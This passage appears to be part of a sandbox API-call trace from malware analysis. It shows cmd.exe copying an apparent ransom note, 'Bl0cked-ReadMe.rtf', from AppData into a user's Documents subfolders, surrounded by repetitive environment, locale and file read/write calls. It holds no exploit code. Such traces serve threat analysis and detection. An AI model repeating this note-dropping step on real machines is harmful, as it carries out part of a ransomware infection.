lpcbData=0x22ec80*=0x1000) returned 0x2 [0139.475] RegCloseKey (hKey=0x40) returned 0x0 [0139.476] time (in: timer=0x0 | out: timer=0x0) returned 0x5b88636e [0139.476] srand (_Seed=0x5b88636e) [0139.476] GetCommandLineW () returned="\"C:\\Windows\\system32\\cmd.exe\" /C type \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\BL0CKE~1.RTF\" > \"C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\5OWEKS~1\\NRWDON~1\\1VHPWY~1\\Bl0cked-ReadMe.rtf\"" [0139.476] GetCommandLineW () returned="\"C:\\Windows\\system32\\cmd.exe\" /C type \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\BL0CKE~1.RTF\" > \"C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\5OWEKS~1\\NRWDON~1\\1VHPWY~1\\Bl0cked-ReadMe.rtf\"" [0139.476] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a9e5260 | out: 
lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0139.476] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x2a1938, nSize=0x104 | out: lpFilename="C:\\Windows\\system32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe")) returned 0x1b [0139.476] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0139.476] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0139.476] GetEnvironmentVariableW (in: lpName="PROMPT", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0139.476] _wcsicmp (_String1="PROMPT", _String2="CD") returned 13 [0139.476] _wcsicmp (_String1="PROMPT", _String2="ERRORLEVEL") returned 11 [0139.476] _wcsicmp (_String1="PROMPT", _String2="CMDEXTVERSION") returned 13 [0139.476] _wcsicmp (_String1="PROMPT", _String2="CMDCMDLINE") returned 13 [0139.476] _wcsicmp (_String1="PROMPT", _String2="DATE") returned 12 [0139.476] _wcsicmp (_String1="PROMPT", _String2="TIME") returned -4 [0139.476] _wcsicmp (_String1="PROMPT", _String2="RANDOM") returned -2 [0139.476] _wcsicmp (_String1="PROMPT", _String2="HIGHESTNUMANODENUMBER") returned 8 [0139.476] SetEnvironmentVariableW (lpName="PROMPT", lpValue="$P$G") returned 1 [0139.476] GetEnvironmentStringsW () returned 0x2a2328* [0139.477] FreeEnvironmentStringsW (penv=0x2a2328) returned 1 [0139.477] GetEnvironmentVariableW (in: lpName="COMSPEC", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0139.477] GetEnvironmentVariableW (in: lpName="KEYS", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0139.477] _wcsicmp (_String1="KEYS", _String2="CD") returned 8 [0139.477] _wcsicmp (_String1="KEYS", _String2="ERRORLEVEL") returned 6 [0139.477] 
_wcsicmp (_String1="KEYS", _String2="CMDEXTVERSION") returned 8 [0139.477] _wcsicmp (_String1="KEYS", _String2="CMDCMDLINE") returned 8 [0139.477] _wcsicmp (_String1="KEYS", _String2="DATE") returned 7 [0139.477] _wcsicmp (_String1="KEYS", _String2="TIME") returned -9 [0139.477] _wcsicmp (_String1="KEYS", _String2="RANDOM") returned -7 [0139.477] _wcsicmp (_String1="KEYS", _String2="HIGHESTNUMANODENUMBER") returned 3 [0139.477] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x22fa48 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0139.477] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop", nBufferLength=0x104, lpBuffer=0x22fa48, lpFilePart=0x22fa44 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop", lpFilePart=0x22fa44*="Desktop") returned 0x18 [0139.477] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 0x11 [0139.477] FindFirstFileW (in: lpFileName="C:\\Users", lpFindFileData=0x22f7c4 | out: lpFindFileData=0x22f7c4) returned 0x2a0068 [0139.477] FindClose (in: hFindFile=0x2a0068 | out: hFindFile=0x2a0068) returned 1 [0139.477] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5", lpFindFileData=0x22f7c4 | out: lpFindFileData=0x22f7c4) returned 0x2a0068 [0139.477] FindClose (in: hFindFile=0x2a0068 | out: hFindFile=0x2a0068) returned 1 [0139.477] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop", lpFindFileData=0x22f7c4 | out: lpFindFileData=0x22f7c4) returned 0x2a0068 [0139.477] FindClose (in: hFindFile=0x2a0068 | out: hFindFile=0x2a0068) returned 1 [0139.478] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 0x11 [0139.478] SetCurrentDirectoryW (lpPathName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 1 [0139.478] SetEnvironmentVariableW (lpName="=C:", lpValue="C:\\Users\\EEBsYm5\\Desktop") returned 1 [0139.478] GetEnvironmentStringsW () returned 0x2a2b48* 
[0139.478] FreeEnvironmentStringsW (penv=0x2a2b48) returned 1 [0139.478] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a9e5260 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0139.478] GetConsoleOutputCP () returned 0x1b5 [0139.485] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0139.485] GetUserDefaultLCID () returned 0x409 [0139.491] GetLocaleInfoW (in: Locale=0x409, LCType=0x1e, lpLCData=0x4a9e4950, cchData=8 | out: lpLCData=":") returned 2 [0139.491] GetLocaleInfoW (in: Locale=0x409, LCType=0x23, lpLCData=0x22fb88, cchData=128 | out: lpLCData="0") returned 2 [0139.491] GetLocaleInfoW (in: Locale=0x409, LCType=0x21, lpLCData=0x22fb88, cchData=128 | out: lpLCData="0") returned 2 [0139.491] GetLocaleInfoW (in: Locale=0x409, LCType=0x24, lpLCData=0x22fb88, cchData=128 | out: lpLCData="1") returned 2 [0139.492] GetLocaleInfoW (in: Locale=0x409, LCType=0x1d, lpLCData=0x4a9e4940, cchData=8 | out: lpLCData="/") returned 2 [0139.492] GetLocaleInfoW (in: Locale=0x409, LCType=0x31, lpLCData=0x4a9e4d80, cchData=32 | out: lpLCData="Mon") returned 4 [0139.492] GetLocaleInfoW (in: Locale=0x409, LCType=0x32, lpLCData=0x4a9e4d40, cchData=32 | out: lpLCData="Tue") returned 4 [0139.492] GetLocaleInfoW (in: Locale=0x409, LCType=0x33, lpLCData=0x4a9e4d00, cchData=32 | out: lpLCData="Wed") returned 4 [0139.492] GetLocaleInfoW (in: Locale=0x409, LCType=0x34, lpLCData=0x4a9e4cc0, cchData=32 | out: lpLCData="Thu") returned 4 [0139.492] GetLocaleInfoW (in: Locale=0x409, LCType=0x35, lpLCData=0x4a9e4c80, cchData=32 | out: lpLCData="Fri") returned 4 [0139.492] GetLocaleInfoW (in: Locale=0x409, LCType=0x36, lpLCData=0x4a9e4c40, cchData=32 | out: lpLCData="Sat") returned 4 [0139.492] GetLocaleInfoW (in: Locale=0x409, LCType=0x37, lpLCData=0x4a9e4c00, cchData=32 | out: lpLCData="Sun") returned 4 [0139.492] GetLocaleInfoW (in: Locale=0x409, LCType=0xe, lpLCData=0x4a9e4930, cchData=8 | out: lpLCData=".") returned 2 
[0139.492] GetLocaleInfoW (in: Locale=0x409, LCType=0xf, lpLCData=0x4a9e4920, cchData=8 | out: lpLCData=",") returned 2 [0139.492] setlocale (category=0, locale=".OCP") returned="English_United States.437" [0139.493] GetConsoleTitleW (in: lpConsoleTitle=0x290918, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0139.498] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76910000 [0139.498] GetProcAddress (hModule=0x76910000, lpProcName="CopyFileExW") returned 0x7694ac6c [0139.498] GetProcAddress (hModule=0x76910000, lpProcName="IsDebuggerPresent") returned 0x76953ea8 [0139.498] GetProcAddress (hModule=0x76910000, lpProcName="SetConsoleInputExeNameW") returned 0x76962732 [0139.499] _wcsicmp (_String1="type", _String2=")") returned 75 [0139.499] _wcsicmp (_String1="FOR", _String2="type") returned -14 [0139.499] _wcsicmp (_String1="FOR/?", _String2="type") returned -14 [0139.499] _wcsicmp (_String1="IF", _String2="type") returned -11 [0139.499] _wcsicmp (_String1="IF/?", _String2="type") returned -11 [0139.499] _wcsicmp (_String1="REM", _String2="type") returned -2 [0139.499] _wcsicmp (_String1="REM/?", _String2="type") returned -2 [0139.503] _get_osfhandle (_FileHandle=1) returned 0x7 [0139.503] _get_osfhandle (_FileHandle=1) returned 0x7 [0139.503] _get_osfhandle (_FileHandle=1) returned 0x7 [0139.503] GetFileType (hFile=0x7) returned 0x2 [0139.521] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0139.521] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x22fa80 | out: lpMode=0x22fa80) returned 1 [0139.521] _dup (_FileHandle=1) returned 3 [0139.522] _close (_FileHandle=1) returned 0 [0139.538] _wcsicmp (_String1="C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\5OWEKS~1\\NRWDON~1\\1VHPWY~1\\Bl0cked-ReadMe.rtf", _String2="con") returned -53 [0139.538] CreateFileW (lpFileName="C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\5OWEKS~1\\NRWDON~1\\1VHPWY~1\\Bl0cked-ReadMe.rtf" (normalized: 
"c:\\users\\eebsym5\\docume~1\\2w7_ew\\5oweks~1\\nrwdon~1\\1vhpwy~1\\bl0cked-readme.rtf"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x22fa50, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x4c [0139.538] _open_osfhandle (_OSFileHandle=0x4c, _Flags=8) returned 1 [0139.538] GetConsoleTitleW (in: lpConsoleTitle=0x22f880, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0139.538] _wcsicmp (_String1="type", _String2="DIR") returned 16 [0139.538] _wcsicmp (_String1="type", _String2="ERASE") returned 15 [0139.538] _wcsicmp (_String1="type", _String2="DEL") returned 16 [0139.538] _wcsicmp (_String1="type", _String2="TYPE") returned 0 [0139.539] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a9e5260 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0139.539] FindFirstFileExW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\BL0CKE~1.RTF", fInfoLevelId=0x1, lpFindFileData=0x22f3e4, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x22f3e4) returned 0x290ee0 [0139.539] _wcsicmp (_String1="BL0CKE~1.RTF", _String2=".") returned 52 [0139.539] _wcsicmp (_String1="BL0CKE~1.RTF", _String2="..") returned 52 [0139.540] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\BL0CKE~1.RTF" (normalized: "c:\\users\\eebsym5\\appdata\\roaming\\bl0cke~1.rtf")) returned 0x2020 [0139.540] CreateFileW (lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\Bl0cked-ReadMe.rtf" (normalized: "c:\\users\\eebsym5\\appdata\\roaming\\bl0cked-readme.rtf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x22e2f0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x54 [0139.540] _open_osfhandle (_OSFileHandle=0x54, _Flags=8) returned 4 [0139.540] _get_osfhandle (_FileHandle=4) returned 0x54 [0139.540] GetFileType (hFile=0x54) returned 0x1 [0139.540] _get_osfhandle (_FileHandle=4) returned 
0x54 [0139.540] GetFileSize (in: hFile=0x54, lpFileSizeHigh=0x22e348 | out: lpFileSizeHigh=0x22e348*=0x0) returned 0x1632 [0139.540] _get_osfhandle (_FileHandle=4) returned 0x54 [0139.540] SetFilePointer (in: hFile=0x54, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0139.540] _get_osfhandle (_FileHandle=4) returned 0x54 [0139.540] ReadFile (in: hFile=0x54, lpBuffer=0x22f180, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x22e370, lpOverlapped=0x0 | out: lpBuffer=0x22f180*, lpNumberOfBytesRead=0x22e370*=0x200, lpOverlapped=0x0) returned 1 [0139.540] _get_osfhandle (_FileHandle=1) returned 0x4c [0139.540] GetFileType (hFile=0x4c) returned 0x1 [0139.540] _get_osfhandle (_FileHandle=1) returned 0x4c [0139.540] GetFileType (hFile=0x4c) returned 0x1 [0139.540] _get_osfhandle (_FileHandle=1) returned 0x4c [0139.540] WriteFile (in: hFile=0x4c, lpBuffer=0x22f180*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x22e364, lpOverlapped=0x0 | out: lpBuffer=0x22f180*, lpNumberOfBytesWritten=0x22e364*=0x50, lpOverlapped=0x0) returned 1 [0139.541] _get_osfhandle (_FileHandle=1) returned 0x4c [0139.541] GetFileType (hFile=0x4c) returned 0x1 [0139.541] _get_osfhandle (_FileHandle=1) returned 0x4c [0139.541] WriteFile (in: hFile=0x4c, lpBuffer=0x22f1d0*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x22e364, lpOverlapped=0x0 | out: lpBuffer=0x22f1d0*, lpNumberOfBytesWritten=0x22e364*=0x50, lpOverlapped=0x0) returned 1 [0139.541] _get_osfhandle (_FileHandle=1) returned 0x4c [0139.541] GetFileType (hFile=0x4c) returned 0x1 [0139.541] _get_osfhandle (_FileHandle=1) returned 0x4c [0139.541] WriteFile (in: hFile=0x4c, lpBuffer=0x22f220*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x22e364, lpOverlapped=0x0 | out: lpBuffer=0x22f220*, lpNumberOfBytesWritten=0x22e364*=0x50, lpOverlapped=0x0) returned 1 [0139.541] _get_osfhandle (_FileHandle=1) returned 0x4c [0139.541] GetFileType (hFile=0x4c) returned 0x1 
[0139.541] _get_osfhandle (_FileHandle=1) returned 0x4c [0139.541] WriteFile (in: hFile=0x4c, lpBuffer=0x22f270*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x22e364, lpOverlapped=0x0 | out: lpBuffer=0x22f270*, lpNumberOfBytesWritten=0x22e364*=0x50, lpOverlapped=0x0) returned 1 [0139.542] _get_osfhandle (_FileHandle=1) returned 0x4c [0139.542] GetFileType (hFile=0x4c) returned 0x1 [0139.542] _get_osfhandle (_FileHandle=1) returned 0x4c [0139.542] WriteFile (in: hFile=0x4c, lpBuffer=0x22f2c0*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x22e364, lpOverlapped=0x0 | out: lpBuffer=0x22f2c0*, lpNumberOfBytesWritten=0x22e364*=0x50, lpOverlapped=0x0) returned 1 [0139.542] _get_osfhandle (_FileHandle=1) returned 0x4c [0139.542] GetFileType (hFile=0x4c) returned 0x1 [0139.542] _get_osfhandle (_FileHandle=1) returned 0x4c [0139.542] WriteFile (in: hFile=0x4c, lpBuffer=0x22f310*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x22e364, lpOverlapped=0x0 | out: lpBuffer=0x22f310*, lpNumberOfBytesWritten=0x22e364*=0x50, lpOverlapped=0x0) returned 1 [0139.542] _get_osfhandle (_FileHandle=1) returned 0x4c [0139.542] GetFileType (hFile=0x4c) returned 0x1 [0139.542] _get_osfhandle (_FileHandle=1) returned 0x4c [0139.542] WriteFile (in: hFile=0x4c, lpBuffer=0x22f360*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x22e364, lpOverlapped=0x0 | out: lpBuffer=0x22f360*, lpNumberOfBytesWritten=0x22e364*=0x20, lpOverlapped=0x0) returned 1 [0139.542] _get_osfhandle (_FileHandle=4) returned 0x54 [0139.542] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x22e350 | out: lpNewFilePointer=0x0) returned 1 [0139.542] _get_osfhandle (_FileHandle=4) returned 0x54 [0139.542] ReadFile (in: hFile=0x54, lpBuffer=0x22f180, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x22e370, lpOverlapped=0x0 | out: lpBuffer=0x22f180*, lpNumberOfBytesRead=0x22e370*=0x200, lpOverlapped=0x0) returned 1 [0139.542] _get_osfhandle (_FileHandle=1) 
returned 0x4c [0139.542] GetFileType (hFile=0x4c) returned 0x1 [0139.542] _get_osfhandle (_FileHandle=1) returned 0x4c [0139.542] GetFileType (hFile=0x4c) returned 0x1 [0139.542] _get_osfhandle (_FileHandle=1) returned 0x4c [0139.542] WriteFile (in: hFile=0x4c, lpBuffer=0x22f180*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x22e364, lpOverlapped=0x0 | out: lpBuffer=0x22f180*, lpNumberOfBytesWritten=0x22e364*=0x50, lpOverlapped=0x0) returned 1 [0139.542] _get_osfhandle (_FileHandle=1) returned 0x4c [0139.542] GetFileType (hFile=0x4c) returned 0x1 [0139.542] _get_osfhandle (_FileHandle=1) returned 0x4c [0139.542] WriteFile (in: hFile=0x4c, lpBuffer=0x22f1d0*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x22e364, lpOverlapped=0x0 | out: lpBuffer=0x22f1d0*, lpNumberOfBytesWritten=0x22e364*=0x50, lpOverlapped=0x0) returned 1 [0139.542] _get_osfhandle (_FileHandle=1) returned 0x4c [0139.542] GetFileType (hFile=0x4c) returned 0x1 [0139.542] _get_osfhandle (_FileHandle=1) returned 0x4c [0139.542] WriteFile (in: hFile=0x4c, lpBuffer=0x22f220*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x22e364, lpOverlapped=0x0 | out: lpBuffer=0x22f220*, lpNumberOfBytesWritten=0x22e364*=0x50, lpOverlapped=0x0) returned 1 [0139.542] _get_osfhandle (_FileHandle=1) returned 0x4c [0139.543] GetFileType (hFile=0x4c) returned 0x1 [0139.543] _get_osfhandle (_FileHandle=1) returned 0x4c [0139.543] WriteFile (in: hFile=0x4c, lpBuffer=0x22f270*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x22e364, lpOverlapped=0x0 | out: lpBuffer=0x22f270*, lpNumberOfBytesWritten=0x22e364*=0x50, lpOverlapped=0x0) returned 1 [0139.543] _get_osfhandle (_FileHandle=1) returned 0x4c [0139.543] GetFileType (hFile=0x4c) returned 0x1 [0139.543] _get_osfhandle (_FileHandle=1) returned 0x4c [0139.543] WriteFile (in: hFile=0x4c, lpBuffer=0x22f2c0*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x22e364, lpOverlapped=0x0 | out: lpBuffer=0x22f2c0*, lpNumberOfBytesWritten=0x22e364*=0x50, 
lpOverlapped=0x0) returned 1 [0139.543] _get_osfhandle (_FileHandle=1) returned 0x4c [0139.543] GetFileType (hFile=0x4c) returned 0x1 [0139.543] _get_osfhandle (_FileHandle=1) returned 0x4c [0139.543] WriteFile (in: hFile=0x4c, lpBuffer=0x22f310*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x22e364, lpOverlapped=0x0 | out: lpBuffer=0x22f310*, lpNumberOfBytesWritten=0x22e364*=0x50, lpOverlapped=0x0) returned 1 [0139.543] _get_osfhandle (_FileHandle=1) returned 0x4c [0139.543] GetFileType (hFile=0x4c) returned 0x1 [0139.543] _get_osfhandle (_FileHandle=1) returned 0x4c [0139.543] WriteFile (in: hFile=0x4c, lpBuffer=0x22f360*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x22e364, lpOverlapped=0x0 | out: lpBuffer=0x22f360*, lpNumberOfBytesWritten=0x22e364*=0x20, lpOverlapped=0x0) returned 1 [0139.543] _get_osfhandle (_FileHandle=4) returned 0x54 [0139.543] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x22e350 | out: lpNewFilePointer=0x0) returned 1 [0139.543] _get_osfhandle (_FileHandle=4) returned 0x54 [0139.543] ReadFile (in: hFile=0x54, lpBuffer=0x22f180, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x22e370, lpOverlapped=0x0 | out: lpBuffer=0x22f180*, lpNumberOfBytesRead=0x22e370*=0x200, lpOverlapped=0x0) returned 1 [0139.543] _get_osfhandle (_FileHandle=1) returned 0x4c [0139.543] GetFileType (hFile=0x4c) returned 0x1 [0139.543] _get_osfhandle (_FileHandle=1) returned 0x4c [0139.543] GetFileType (hFile=0x4c) returned 0x1 [0139.543] _get_osfhandle (_FileHandle=1) returned 0x4c [0139.543] WriteFile (in: hFile=0x4c, lpBuffer=0x22f180*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x22e364, lpOverlapped=0x0 | out: lpBuffer=0x22f180*, lpNumberOfBytesWritten=0x22e364*=0x50, lpOverlapped=0x0) returned 1 [0139.543] _get_osfhandle (_FileHandle=1) returned 0x4c [0139.543] GetFileType (hFile=0x4c) returned 0x1 [0139.543] _get_osfhandle (_FileHandle=1) returned 0x4c [0139.543] WriteFile (in: hFile=0x4c, 
lpBuffer=0x22f1d0*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x22e364, lpOverlapped=0x0 | out: lpBuffer=0x22f1d0*, lpNumberOfBytesWritten=0x22e364*=0x50, lpOverlapped=0x0) returned 1 [0139.543] _get_osfhandle (_FileHandle=1) returned 0x4c [0139.543] GetFileType (hFile=0x4c) returned 0x1 [0139.543] _get_osfhandle (_FileHandle=1) returned 0x4c [0139.543] WriteFile (in: hFile=0x4c, lpBuffer=0x22f220*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x22e364, lpOverlapped=0x0 | out: lpBuffer=0x22f220*, lpNumberOfBytesWritten=0x22e364*=0x50, lpOverlapped=0x0) returned 1 [0139.544] _get_osfhandle (_FileHandle=1) returned 0x4c [0139.544] GetFileType (hFile=0x4c) returned 0x1 [0139.544] _get_osfhandle (_FileHandle=1) returned 0x4c [0139.544] WriteFile (in: hFile=0x4c, lpBuffer=0x22f270*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x22e364, lpOverlapped=0x0 | out: lpBuffer=0x22f270*, lpNumberOfBytesWritten=0x22e364*=0x50, lpOverlapped=0x0) returned 1 [0139.544] _get_osfhandle (_FileHandle=1) returned 0x4c [0139.544] GetFileType (hFile=0x4c) returned 0x1 [0139.544] _get_osfhandle (_FileHandle=1) returned 0x4c [0139.544] WriteFile (in: hFile=0x4c, lpBuffer=0x22f2c0*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x22e364, lpOverlapped=0x0 | out: lpBuffer=0x22f2c0*, lpNumberOfBytesWritten=0x22e364*=0x50, lpOverlapped=0x0) returned 1 [0139.544] _get_osfhandle (_FileHandle=1) returned 0x4c [0139.544] GetFileType (hFile=0x4c) returned 0x1 [0139.544] _get_osfhandle (_FileHandle=1) returned 0x4c [0139.544] WriteFile (in: hFile=0x4c, lpBuffer=0x22f310*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x22e364, lpOverlapped=0x0 | out: lpBuffer=0x22f310*, lpNumberOfBytesWritten=0x22e364*=0x50, lpOverlapped=0x0) returned 1 [0139.544] _get_osfhandle (_FileHandle=1) returned 0x4c [0139.544] GetFileType (hFile=0x4c) returned 0x1 [0139.544] _get_osfhandle (_FileHandle=1) returned 0x4c [0139.544] WriteFile (in: hFile=0x4c, lpBuffer=0x22f360*, 
nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x22e364, lpOverlapped=0x0 | out: lpBuffer=0x22f360*, lpNumberOfBytesWritten=0x22e364*=0x20, lpOverlapped=0x0) returned 1 [0139.544] _get_osfhandle (_FileHandle=4) returned 0x54 [0139.544] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x22e350 | out: lpNewFilePointer=0x0) returned 1 [0139.544] _get_osfhandle (_FileHandle=4) returned 0x54 [0139.544] ReadFile (in: hFile=0x54, lpBuffer=0x22f180, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x22e370, lpOverlapped=0x0 | out: lpBuffer=0x22f180*, lpNumberOfBytesRead=0x22e370*=0x200, lpOverlapped=0x0) returned 1 [0139.544] _get_osfhandle (_FileHandle=1) returned 0x4c [0139.544] GetFileType (hFile=0x4c) returned 0x1 [0139.544] _get_osfhandle (_FileHandle=1) returned 0x4c [0139.544] GetFileType (hFile=0x4c) returned 0x1 [0139.544] _get_osfhandle (_FileHandle=1) returned 0x4c [0139.544] WriteFile (in: hFile=0x4c, lpBuffer=0x22f180*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x22e364, lpOverlapped=0x0 | out: lpBuffer=0x22f180*, lpNumberOfBytesWritten=0x22e364*=0x50, lpOverlapped=0x0) returned 1 [0139.544] _get_osfhandle (_FileHandle=1) returned 0x4c [0139.544] GetFileType (hFile=0x4c) returned 0x1 [0139.544] _get_osfhandle (_FileHandle=1) returned 0x4c [0139.544] WriteFile (in: hFile=0x4c, lpBuffer=0x22f1d0*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x22e364, lpOverlapped=0x0 | out: lpBuffer=0x22f1d0*, lpNumberOfBytesWritten=0x22e364*=0x50, lpOverlapped=0x0) returned 1 [0139.544] _get_osfhandle (_FileHandle=1) returned 0x4c [0139.544] GetFileType (hFile=0x4c) returned 0x1 [0139.545] _get_osfhandle (_FileHandle=1) returned 0x4c [0139.545] WriteFile (in: hFile=0x4c, lpBuffer=0x22f220*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x22e364, lpOverlapped=0x0 | out: lpBuffer=0x22f220*, lpNumberOfBytesWritten=0x22e364*=0x50, lpOverlapped=0x0) returned 1 [0139.545] _get_osfhandle (_FileHandle=1) returned 0x4c 
[0139.545] GetFileType (hFile=0x4c) returned 0x1 [0139.545] _get_osfhandle (_FileHandle=1) returned 0x4c [0139.545] WriteFile (in: hFile=0x4c, lpBuffer=0x22f270*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x22e364, lpOverlapped=0x0 | out: lpBuffer=0x22f270*, lpNumberOfBytesWritten=0x22e364*=0x50, lpOverlapped=0x0) returned 1 [0139.545] _get_osfhandle (_FileHandle=1) returned 0x4c [0139.545] GetFileType (hFile=0x4c) returned 0x1 [0139.545] _get_osfhandle (_FileHandle=1) returned 0x4c [0139.545] WriteFile (in: hFile=0x4c, lpBuffer=0x22f2c0*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x22e364, lpOverlapped=0x0 | out: lpBuffer=0x22f2c0*, lpNumberOfBytesWritten=0x22e364*=0x50, lpOverlapped=0x0) returned 1 [0139.545] _get_osfhandle (_FileHandle=1) returned 0x4c [0139.545] GetFileType (hFile=0x4c) returned 0x1 [0139.545] _get_osfhandle (_FileHandle=1) returned 0x4c [0139.545] WriteFile (in: hFile=0x4c, lpBuffer=0x22f310*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x22e364, lpOverlapped=0x0 | out: lpBuffer=0x22f310*, lpNumberOfBytesWritten=0x22e364*=0x50, lpOverlapped=0x0) returned 1 [0139.545] _get_osfhandle (_FileHandle=1) returned 0x4c [0139.545] GetFileType (hFile=0x4c) returned 0x1 [0139.545] _get_osfhandle (_FileHandle=1) returned 0x4c [0139.545] WriteFile (in: hFile=0x4c, lpBuffer=0x22f360*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x22e364, lpOverlapped=0x0 | out: lpBuffer=0x22f360*, lpNumberOfBytesWritten=0x22e364*=0x20, lpOverlapped=0x0) returned 1 [0139.545] _get_osfhandle (_FileHandle=4) returned 0x54 [0139.545] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x22e350 | out: lpNewFilePointer=0x0) returned 1 [0139.545] _get_osfhandle (_FileHandle=4) returned 0x54 [0139.545] ReadFile (in: hFile=0x54, lpBuffer=0x22f180, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x22e370, lpOverlapped=0x0 | out: lpBuffer=0x22f180*, lpNumberOfBytesRead=0x22e370*=0x200, lpOverlapped=0x0) returned 1 
